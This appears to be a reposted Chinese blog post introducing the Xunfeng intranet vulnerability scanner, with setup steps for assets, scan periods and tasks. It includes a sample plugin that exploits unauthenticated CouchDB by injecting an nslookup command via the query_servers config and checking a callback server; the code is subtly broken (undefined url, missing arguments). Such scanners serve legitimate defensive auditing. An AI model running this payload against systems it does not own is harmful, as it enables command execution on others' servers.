巡风源码剖析——细致了解与使用

巡风源码剖析——细致了解与使用_第1张图片


QQ 1274510382
Wechat JNZ_aming
商业联盟 QQ群538250800
技术搞事 QQ群599020441
解决方案 QQ群152889761
加入我们 QQ群649347320
共享学习 QQ群674240731
纪年科技aming
网络安全 ,深度学习,嵌入式,机器强化,生物智能,生命科学。


巡风是一款适用于企业内网的漏洞快速应急,巡航扫描系统。

查看内部网络资产分布 指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表

传送门

  • 其主体分为两部分:网络资产识别引擎,漏洞检测引擎。

在这里插入图片描述巡风源码剖析——细致了解与使用_第2张图片巡风源码剖析——细致了解与使用_第3张图片在这里插入图片描述巡风源码剖析——细致了解与使用_第4张图片巡风源码剖析——细致了解与使用_第5张图片在这里插入图片描述使用例子:

 	import urllib2
	import random
	import socket

def get_plugin_info():  # 插件描述信息
    plugin_info = {
            "name": "CouchDB未授权访问",
            "info": "导致敏感信息泄露,攻击者可通过控制面板执行系统命令,导致服务器被入侵。",
            "level": "高危",
            "type": "未授权访问",
            "author": "wolf@YSRC",
            "url": "",
            "keyword": "server:couchdb",  # 推荐搜索关键字
    }

def get_ver_ip(ip):
    csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    csock.connect((ip, 80))
    (addr, port) = csock.getsockname()
    csock.close()
    return addr

def random_str(len):
    str1=""
    for i in range(len):
        str1+=(random.choice("ABCDEFGH1234567890"))
    return str(str1)

def check(ip,port,timeout):
    rand_str = random_str(8)
    cmd = random_str(4)
    server_ip = get_ver_ip()
    req_list = [
        ["/_config/query_servers/%s"%(cmd),'"nslookup %s %s>log"'%(rand_str,server_ip)],
        ["/vultest123",''],
        ["/vultest123/test",'{"_id":"safetest"}']
    ]
    for req_info in req_list:
        try:
            request = urllib2.Request(url+req_info[0],req_info[1],timeout=timeout)
            request.get_method = lambda: 'PUT'
            urllib2.urlopen(request)
        except:
            pass
    try:
        req_exec = urllib2.Request(url + "/vultest123/_temp_view?limit=11",'{"language":"%s","map":""}'%(cmd))
        req_exec.add_header("Content-Type","application/json")
        urllib2.urlopen(req_exec)
    except:
        pass
    check = urllib2.urlopen("http://%s:8088/%s"%(server_ip,rand_str)).read()
    if 'YES' in check:
        return u"未授权访问"

巡风源码剖析——细致了解与使用_第6张图片

========

 	一、添加IP
 	菜单“配置”--“网络资产探测列表”

巡风源码剖析——细致了解与使用_第7张图片巡风源码剖析——细致了解与使用_第8张图片

二、设置资产探测周期
设置资产探测的扫描周期,

巡风源码剖析——细致了解与使用_第9张图片

资产添加后大约等该40s之后到菜单“统计”处查看存活检查结果	

巡风源码剖析——细致了解与使用_第10张图片

当更新资产时须手动重启巡风相关服务。

再次执行sh Run.sh即可


三. 进行扫描
 
先进行查询

巡风源码剖析——细致了解与使用_第11张图片

选中查询到的IP,并新增任务

巡风源码剖析——细致了解与使用_第12张图片

 任务的相关设置

巡风源码剖析——细致了解与使用_第13张图片

最后单击保存任务提示“新增成功”

巡风源码剖析——细致了解与使用_第14张图片

四、查看任务
菜单“任务”--单击新建的任务查看即可。

巡风源码剖析——细致了解与使用_第15张图片巡风源码剖析——细致了解与使用_第16张图片

========

手动测试好使:
巡风源码剖析——细致了解与使用_第17张图片

填入正确的masscan路径和资产范围

巡风源码剖析——细致了解与使用_第18张图片

你可能感兴趣的:(渗透测试)